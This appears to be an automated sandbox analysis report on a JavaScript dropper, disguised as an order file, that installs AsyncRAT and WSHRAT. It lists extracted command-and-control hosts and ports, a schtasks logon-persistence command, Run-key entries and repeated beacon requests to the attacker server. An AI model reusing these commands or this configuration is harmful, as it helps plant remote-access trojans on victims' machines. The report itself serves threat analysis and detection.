Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
18/03/2025, 21:42 UTC
Static task
static1
Behavioral task
behavioral1
Sample
ORDER-984486-895432.js
Resource
win7-20250207-en
General
-
Target
ORDER-984486-895432.js
-
Size
563KB
-
MD5
ab0dac9d1b9b83383dbc5d469d5fa1ae
-
SHA1
b15b24f82ef0a07fce5b7c2735d8a8b46b547287
-
SHA256
398e3d3d2ad8e2e91693c1682780d2352ebe962b67547af5c20735ae97ea94a9
-
SHA512
66829799b8233f142aa1420f1e2dd4dfbdc3f2417279b12481d87612a0d97add61d819e58c369818ac201a4ba568e92d5fcd4b9ce17fb68332eeb5718f2f72fc
-
SSDEEP
3072:MCAFTI3Ws7WZ4hRPhts7YRw7Xx5FzNM6x/P0UHD2yQ/ry:MCAFs3F7WZIhe7nbDIxu
Malware Config
Extracted
asyncrat
0.5.7B
March-25
chongmei33.publicvm.com:2703
chongmei33.publicvm.com:7031
umarmira055.duckdns.org:2703
umarmira055.duckdns.org:7031
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
WindowsUpdate.exe
-
install_folder
%Temp%
Extracted
wshrat
http://chongmei33.myddns.rocks:7044
Signatures
-
Asyncrat family
-
Wshrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000015eac-14.dat family_asyncrat -
Blocklisted process makes network request 21 IoCs
flow pid Process 5 2924 wscript.exe 6 2924 wscript.exe 11 2924 wscript.exe 13 2924 wscript.exe 14 2924 wscript.exe 15 2924 wscript.exe 17 2924 wscript.exe 18 2924 wscript.exe 19 2924 wscript.exe 21 2924 wscript.exe 22 2924 wscript.exe 23 2924 wscript.exe 25 2924 wscript.exe 26 2924 wscript.exe 27 2924 wscript.exe 29 2924 wscript.exe 30 2924 wscript.exe 31 2924 wscript.exe 33 2924 wscript.exe 34 2924 wscript.exe 35 2924 wscript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js wscript.exe -
Executes dropped EXE 2 IoCs
pid Process 2076 RDo.exe 3032 WindowsUpdate.exe -
Loads dropped DLL 1 IoCs
pid Process 2624 cmd.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\adobe.js\"" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\adobe = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\adobe.js\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\adobe.js\"" wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\adobe = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\adobe.js\"" WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2636 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2600 schtasks.exe -
Script User-Agent 21 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 15 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 21 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 13 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 19 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 26 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 27 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 30 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 34 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 35 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 14 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 17 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 25 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 31 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 5 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 18 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 22 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 23 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 29 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 33 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript HTTP User-Agent header 6 WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2076 RDo.exe 2076 RDo.exe 2076 RDo.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2076 RDo.exe Token: SeDebugPrivilege 3032 WindowsUpdate.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2240 2872 wscript.exe 28 PID 2872 wrote to memory of 2240 2872 wscript.exe 28 PID 2872 wrote to memory of 2240 2872 wscript.exe 28 PID 2872 wrote to memory of 1256 2872 wscript.exe 29 PID 2872 wrote to memory of 1256 2872 wscript.exe 29 PID 2872 wrote to memory of 1256 2872 wscript.exe 29 PID 2240 wrote to memory of 2924 2240 WScript.exe 30 PID 2240 wrote to memory of 2924 2240 WScript.exe 30 PID 2240 wrote to memory of 2924 2240 WScript.exe 30 PID 1256 wrote to memory of 2076 1256 WScript.exe 31 PID 1256 wrote to memory of 2076 1256 WScript.exe 31 PID 1256 wrote to memory of 2076 1256 WScript.exe 31 PID 1256 wrote to memory of 2076 1256 WScript.exe 31 PID 2076 wrote to memory of 2852 2076 RDo.exe 34 PID 2076 wrote to memory of 2852 2076 RDo.exe 34 PID 2076 wrote to memory of 2852 2076 RDo.exe 34 PID 2076 wrote to memory of 2852 2076 RDo.exe 34 PID 2076 wrote to memory of 2624 2076 RDo.exe 36 PID 2076 wrote to memory of 2624 2076 RDo.exe 36 PID 2076 wrote to memory of 2624 2076 RDo.exe 36 PID 2076 wrote to memory of 2624 2076 RDo.exe 36 PID 2852 wrote to memory of 2600 2852 cmd.exe 38 PID 2852 wrote to memory of 2600 2852 cmd.exe 38 PID 2852 wrote to memory of 2600 2852 cmd.exe 38 PID 2852 wrote to memory of 2600 2852 cmd.exe 38 PID 2624 wrote to memory of 2636 2624 cmd.exe 39 PID 2624 wrote to memory of 2636 2624 cmd.exe 39 PID 2624 wrote to memory of 2636 2624 cmd.exe 39 PID 2624 wrote to memory of 2636 2624 cmd.exe 39 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40 PID 2624 wrote to memory of 3032 2624 cmd.exe 40
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ORDER-984486-895432.js1⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\adobe.js"2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\adobe.js"3⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
PID:2924
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\word.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Users\Admin\AppData\Local\Temp\RDo.exe"C:\Users\Admin\AppData\Local\Temp\RDo.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsUpdate" /tr '"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsUpdate" /tr '"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA12F.tmp.bat""4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
-
Network
-
Remote address:8.8.8.8:53Requestchongmei33.myddns.rocksIN AResponsechongmei33.myddns.rocksIN A46.246.82.67
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:8.8.8.8:53Requestumarmira055.duckdns.orgIN AResponseumarmira055.duckdns.orgIN A46.246.82.67
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:46.246.82.67:7044RequestPOST /is-ready HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: WSHRAT|581E7694|JXXXDSWS|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 18/3/2025|JavaScript
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: chongmei33.myddns.rocks:7044
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
-
560 B 172 B 5 4
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
5.9kB 6.3kB 42 38
-
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
606 B 172 B 6 4
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
1.6kB 260 B 13 6
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
930 B 132 B 6 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 172 B 5 4
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
982 B 132 B 7 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
612 B 132 B 6 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 172 B 5 4
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
612 B 172 B 6 4
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready -
560 B 132 B 5 3
HTTP Request
POST http://chongmei33.myddns.rocks:7044/is-ready
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1JavaScript
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
45KB
MD57e54eec2d10957178e6410ba1c899c21
SHA19f79b7ef7b24933b0b106a387fbf5834863dbc78
SHA256d7d374d650d362b4a859f526189cda7ecdef9b0ee60267a1c65c3a9e1bcfd0f8
SHA512e7cec2a67334c72e6476adb53bcb6de575f7c9513a49f0be7a7f6fb00b23ac070335b734631f024c411293cb09d0faa89bf7017837d65f5188884eabf853dd17
-
Filesize
305KB
MD5294f1f4ee9bd1a410379ccc7430c7a69
SHA102436fc31c5fa37c3735dcff0f450c20e302e7a2
SHA256f0cc3f5f26302ba2cd290d11052a42b4adc5401b953439d49723b666ac100187
SHA5128a87e29348ef3bd4c1847a65ef9ffabedba4f51504512819df396123d90e7bf8e1b3e7edb1e4e33419a8d309e47cbaa2f7c3a9f387f6d987cedc4e048d479abd
-
Filesize
160B
MD546a638a0b79a7a9801b4184cc43c92f7
SHA16a1b1e1ff95b1c0bfa5837da4566e1f89b069534
SHA256d372a199c1dd74b21c9bd5e798726a1abaf38b26eb7565485ae54d84c53bcf73
SHA5128a5923a59bc138877f5430db16df4c721c2ca717927407d9f28597160f6c91968f2bd84529bcd826622278cd43a8100aab060cb69fa16e3aa983aa0d1994023c
-
Filesize
82KB
MD533d6e875441823e698ea8b8c4739dfd4
SHA1a446695785e38522c923a5340e43c236ac332616
SHA25632e6e9765b2e1e18699fdcc2817137b22f893457e2a10ae3f66081dd58f811ce
SHA512633a462dba83497be30c969c1c637f144e1ff2bc741687326a53604bce93dd80af12acb49e546942978a2e629d6811b8612cd1362af5d41921ddae59b38977d2